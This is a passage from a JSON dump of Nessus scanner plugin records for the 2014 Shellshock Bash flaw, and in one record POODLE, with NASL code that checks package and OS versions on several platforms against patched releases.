value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:47", "description": "The remote host is running a version of Palo Alto Networks PAN-OS prior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-20T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-SA-2014-0004.NASL", "href": "https://www.tenable.com/plugins/nessus/78587", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78587);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Palo Alto Networks PAN-OS\nprior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. It is, therefore, affected\nby a command injection vulnerability in GNU Bash known as Shellshock,\nwhich is due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/24\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PAN-OS version 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\nversion = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Version\");\nfull_version = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Full_Version\");\nfix = NULL;\n\n# Ensure sufficient granularity.\nif (version !~ \"^\\d+\\.\\d+\") audit(AUDIT_VER_NOT_GRANULAR, app_name, full_version);\n\nif (version =~ \"^6\\.1($|[^0-9])\")\n fix = \"6.1.1\";\nelse if (version =~ \"^6\\.0($|[^0-9])\")\n fix = \"6.0.6\";\nelse if (version =~ \"^5\\.1($|[^0-9])\")\n fix = \"5.1.10\";\nelse\n fix = \"5.0.15\";\n\n# Compare version to fix and report as needed.\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + full_version +\n '\\n Fixed versions : ' + fix +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, full_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:51", "description": "Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-11718.NASL", "href": "https://www.tenable.com/plugins/nessus/77945", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11718.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77945);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11718\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/139129.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?625e21b5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"bash-4.3.25-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T14:53:46", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126547 patch-revision plugins, or deemed non-security related.", "cvss3": {"score": 2.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"}, "published": "2012-09-17T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 126547-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_126547.NASL", "href": "https://www.tenable.com/plugins/nessus/62115", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62115);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (x86) : 126547-10 (deprecated)\");\n script_summary(english:\"Check for patch 126547-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126547 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126547-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126547 instead.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T14:53:30", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126546 patch-revision plugins, or deemed non-security related.", "cvss3": {"score": 2.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"}, "published": "2012-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546.NASL", "href": "https://www.tenable.com/plugins/nessus/62305", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62305);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-10 (deprecated)\");\n script_summary(english:\"Check for patch 126546-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126546 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126546-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/26\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126546 instead.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:22", "description": "The remote host is running a version of Mac OS X 10.8 or 10.9 that does not have Security Update 2014-005 applied. This update contains several security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-17T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3566", "CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2014-005.NASL", "href": "https://www.tenable.com/plugins/nessus/78551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78551);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137, 70574);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"CERT\", value:\"577193\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-10-16-2\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity issues.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.8 or 10.9 that\ndoes not have Security Update 2014-005 applied. This update contains\nseveral security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as\n Shellshock. The vulnerability is due to the processing\n of trailing strings after function definitions in the\n values of environment variables. This allows a remote\n attacker to execute arbitrary code via environment\n variable manipulation depending on the configuration of\n the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability known as POODLE. The vulnerability is due\n to the way SSL 3.0 handles padding bytes when decrypting\n messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. A MitM attacker can decrypt a\n selected byte of a cipher text in as few as 256 tries if\n they are able to force a victim application to\n repeatedly send the same data over newly created SSL 3.0\n connections. (CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT203107\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/533721/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2014-005 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 